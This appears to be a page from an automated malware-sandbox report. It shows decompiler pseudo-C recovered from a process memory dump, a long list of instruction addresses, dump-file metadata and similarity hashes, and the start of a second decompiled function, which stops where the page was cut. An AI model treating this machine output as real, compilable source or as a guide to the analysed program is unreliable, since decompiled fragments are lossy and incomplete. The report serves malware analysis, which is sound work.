													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E1E3EF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E1E3EFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E1E3EFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E1E3EF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E1E3EF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E1E474CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E1E3FD130(_t427, _t494, _t511);
				}
			}

0x1e475ba5
0x1e475baa
0x1e475baf
0x1e475bb4
0x1e475bb6
0x1e475bbc
0x1e475bbe
0x1e475bc4
0x1e475bcd
0x1e475bd3
0x1e475bd6
0x1e475bdc
0x1e475be0
0x1e475be3
0x1e475beb
0x1e475bf2
0x1e475bf8
0x1e475bfe
0x1e475c04
0x1e475c0e
0x1e475c18
0x1e475c1f
0x1e475c25
0x1e475c2a
0x1e475c2c
0x1e475c32
0x1e475c3a
0x1e475c3f
0x1e475c42
0x1e475c48
0x1e475c5b
0x1e475c5b
0x1e475c2c
0x1e475cb7
0x1e475cb9
0x1e475cbf
0x1e475cc2
0x1e475cca
0x1e475ccb
0x1e475ccb
0x1e475cd1
0x1e475cd7
0x1e475cda
0x1e475ce1
0x1e475ce4
0x1e475ce7
0x1e475ced
0x1e475cf3
0x1e475cf9
0x1e475cff
0x1e475d08
0x1e475d0a
0x1e475d0e
0x1e475d10
0x00000000
0x00000000
0x1e475d16
0x1e475d1a
0x00000000
0x00000000
0x1e475d20
0x1e475d22
0x1e475d25
0x1e475d2f
0x1e475d2f
0x1e475d33
0x1e475d3d
0x1e475d49
0x1e475d4b
0x00000000
0x00000000
0x1e475d5a
0x1e475d5d
0x1e475d60
0x00000000
0x00000000
0x1e475d66
0x1e475d69
0x00000000
0x00000000
0x1e475d6f
0x1e475d6f
0x1e475d73
0x1e475d79
0x1e475d7f
0x1e475d86
0x1e475d95
0x1e475d98
0x1e475dba
0x1e475dcb
0x1e475dce
0x1e475dd3
0x1e475dd6
0x1e475dd8
0x1e475de6
0x1e475dec
0x1e475dee
0x1e475df1
0x1e475df3
0x1e47635a
0x1e47635a
0x00000000
0x1e47635a
0x1e475dfe
0x1e475e02
0x1e475e05
0x1e475e07
0x1e475e10
0x1e475e13
0x1e475e1b
0x1e475e1c
0x1e475e21
0x1e475e22
0x1e475e23
0x1e475e25
0x1e475e2a
0x1e475e2c
0x1e475e2e
0x1e475e36
0x1e475e39
0x1e475e42
0x1e475e47
0x1e475e4d
0x1e475e54
0x1e475e54
0x1e475e54
0x1e475e2e
0x1e475e5c
0x1e475e5f
0x1e475e62
0x1e475e64
0x1e475e6b
0x1e475e70
0x1e475e7a
0x1e475e7a
0x1e475e7a
0x1e475e6b
0x1e475e7e
0x1e475e7f
0x1e475e7f
0x1e475e81
0x1e475e87
0x1e475e8b
0x1e475e8c
0x1e475e8c
0x1e475e8c
0x1e475e9a
0x1e475e9c
0x1e475ea2
0x1e475ea6
0x1e475f50
0x1e475f50
0x1e475f57
0x1e475f66
0x1e475f66
0x1e475f66
0x1e475f68
0x1e475f6a
0x1e4763d0
0x00000000
0x1e475f70
0x1e475f70
0x1e475f91
0x1e475f9c
0x1e475f9e
0x1e475fa4
0x1e475fa6
0x1e47638c
0x1e476392
0x1e4763a1
0x1e4763a7
0x1e4763af
0x1e4763af
0x1e4763bd
0x1e4763d8
0x00000000
0x1e4763d8
0x1e475fac
0x1e475fb2
0x1e475fb4
0x1e475fbd
0x1e475fc6
0x1e475fce
0x1e475fd4
0x1e475fdc
0x1e475fec
0x1e475fed
0x1e475fee
0x1e475fef
0x1e475ff9
0x1e475ffa
0x1e475ffb
0x1e475ffc
0x1e476000
0x1e476004
0x1e476012
0x1e476012
0x1e476018
0x1e476019
0x1e47601a
0x1e47601b
0x1e47601c
0x1e476020
0x1e476059
0x1e47605c
0x1e476061
0x1e476061
0x1e476022
0x1e476022
0x1e476022
0x1e476025
0x1e47602a
0x1e47602b
0x1e476031
0x1e476037
0x1e476038
0x1e47603e
0x1e476048
0x1e476049
0x1e47604a
0x1e47604b
0x1e47604c
0x1e47604d
0x1e476053
0x1e476054
0x1e476054
0x1e476062
0x1e476065
0x1e476067
0x1e47606a
0x1e476070
0x1e476075
0x1e476076
0x1e476081
0x1e476087
0x1e476095
0x1e476099
0x1e47609e
0x1e4760a4
0x1e4760ae
0x1e4760b0
0x1e4760b3
0x1e4760b6
0x1e4760b8
0x1e4760ba
0x1e4760ba
0x1e4760ba
0x1e4760ba
0x1e4760be
0x1e4760c0
0x1e4760c5
0x1e4760c5
0x1e4760c5
0x1e4760c6
0x1e4760cd
0x1e476114
0x1e4760cf
0x1e4760cf
0x1e4760d4
0x1e4760d5
0x1e4760da
0x1e4760db
0x1e4760e1
0x1e4760e2
0x1e4760e8
0x1e4760f8
0x1e4760fd
0x1e4760fe
0x1e476102
0x1e476104
0x1e476107
0x1e476109
0x1e47610b
0x1e47610b
0x1e47610b
0x1e47610b
0x1e47610f
0x1e47610f
0x1e476117
0x1e47611a
0x1e47611f
0x1e476125
0x1e476134
0x1e476139
0x1e47613f
0x1e476146
0x1e476148
0x1e47614b
0x1e47614d
0x1e47614f
0x1e47614f
0x1e47614f
0x1e47614f
0x1e476153
0x1e476159
0x1e476159
0x1e47615c
0x1e476163
0x1e476169
0x1e47616c
0x1e476172
0x1e476181
0x1e476186
0x1e476187
0x1e47618b
0x1e476191
0x1e476195
0x1e4761a3
0x1e4761bb
0x1e4761c0
0x1e4761c3
0x1e4761cc
0x1e4761d0
0x1e4761dc
0x1e4761de
0x1e4761e1
0x1e4761e4
0x1e4761e6
0x1e4761e8
0x1e4761e8
0x1e4761e8
0x1e4761e8
0x1e4761e6
0x1e4761ec
0x1e4761f3
0x1e476203
0x1e476209
0x1e47620a
0x1e476216
0x1e47621d
0x1e476227
0x1e476241
0x1e476246
0x1e47624c
0x1e476257
0x1e476259
0x1e47625c
0x1e47625e
0x1e476260
0x1e476260
0x1e476260
0x1e476260
0x1e47625e
0x1e476264
0x1e476267
0x1e476269
0x1e476315
0x1e476315
0x1e47631b
0x1e47631e
0x1e476324
0x1e476327
0x1e47632f
0x1e476330
0x1e476333
0x1e47633a
0x1e47633c
0x1e476335
0x1e476335
0x1e476335
0x1e47633f
0x1e476342
0x1e47634c
0x1e476352
0x1e476355
0x1e476355
0x1e476359
0x00000000
0x1e47626f
0x1e476275
0x1e476275
0x1e476278
0x1e47627e
0x1e47627e
0x1e476281
0x1e476287
0x1e47628d
0x1e476298
0x1e47629c
0x1e4762a2
0x1e47629e
0x1e47629e
0x1e47629e
0x1e4762a7
0x1e4762a7
0x1e4762aa
0x1e4762b0
0x1e4762f0
0x1e4762f0
0x1e4762f2
0x1e4762f8
0x1e4762fd
0x1e4762b2
0x1e4762b2
0x1e4762b2
0x1e4762b5
0x1e4762dd
0x1e4762e2
0x1e4762e5
0x1e4762b7
0x1e4762b8
0x1e4762bb
0x1e4762bd
0x1e4762c0
0x1e4762c4
0x1e4762cd
0x1e4762cd
0x1e4762c0
0x1e4762bb
0x1e4762b5
0x1e476302
0x1e476303
0x1e476305
0x1e476305
0x1e476305
0x1e47630c
0x1e47630c
0x00000000
0x1e47627e
0x1e476269
0x1e475eac
0x1e475ebb
0x1e475ebe
0x1e475ecb
0x1e475ecb
0x1e475ece
0x1e475ece
0x1e475ed4
0x1e475ed7
0x1e475ed9
0x1e475edb
0x1e475edb
0x1e475ee1
0x1e475ee1
0x1e475ee3
0x1e475f20
0x1e475f20
0x1e475ee5
0x1e475ee5
0x1e475ee5
0x1e475ee8
0x1e475f11
0x1e475f18
0x1e475eea
0x1e475eea
0x1e475eed
0x1e475ef2
0x1e475ef8
0x1e475efb
0x1e475f0a
0x1e475f0a
0x1e475eed
0x1e475ee8
0x1e475f22
0x1e475f28
0x00000000
0x00000000
0x1e475f30
0x1e475f31
0x1e475f37
0x1e475f3a
0x1e475f3d
0x1e475f44
0x00000000
0x00000000
0x00000000
0x1e475f46
0x1e475f48
0x1e475f4d
0x00000000
0x1e475f4d
0x1e475dda
0x1e475ddf
0x00000000
0x1e475ddf
0x1e475dd8
0x1e475da7
0x1e475da9
0x1e475dac
0x1e475dae
0x00000000
0x1e475db4
0x1e475db4
0x00000000
0x1e475db4
0x1e475dae
0x1e475d88
0x1e475d8d
0x1e476363
0x1e476369
0x1e47636a
0x1e476370
0x1e476372
0x1e47637a
0x1e47637b
0x1e47637d
0x00000000
0x00000000
0x1e47637f
0x1e476385
0x00000000
0x1e476385
0x1e475d38
0x1e475d3b
0x00000000
0x00000000
0x00000000
0x1e475d3b
0x1e475d27
0x1e475d29
0x00000000
0x00000000
0x00000000
0x1e476360
0x00000000
0x1e476360
0x1e475c10
0x1e475c10
0x1e4763da
0x1e4763e5
0x1e4763e5

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d426be5e6bad36c4c1bdc63a356b2487a42cbb93f6e1f3b5ac607da04226feb0
Instruction ID: a0bdd3ce75a5dc0e3983ab73aa3c8d7d918cfb7383f7af4302fd7e95cef0f5d5
Opcode Fuzzy Hash: d426be5e6bad36c4c1bdc63a356b2487a42cbb93f6e1f3b5ac607da04226feb0
Instruction Fuzzy Hash: 55423A75D10269CFDB20CF68C880BA9B7B2FF45304F1586EAD949AB342D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C6E30, Relevance: .5, Instructions: 481
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1E3C6E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x1e47fca8);
				_push(0x1e3f17f0);
				_push( *[fs:0x0]);
				_t312 =  *0x1e49d360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E1E3EFA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E1E3C74C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E1E3D9BC6( &_v52, 0x1e381080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E1E3E9377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E1E4246A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M1E3C749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E1E3A52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L1E3B2600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L1E3B2600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L1E424735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E1E3EBB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E1E3D2010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L1E424658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E1E3D9BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E1E3A52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L1E3A83AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E1E3A52A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L1E3A83AE(_t428);
														L80:
														E1E3D9BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x1e381080;
														_v72 =  *0x1e381080;
														__eax =  *0x1e381084;
														_v68 =  *0x1e381084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E1E3D9BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E1E3C746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E1E3EB640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
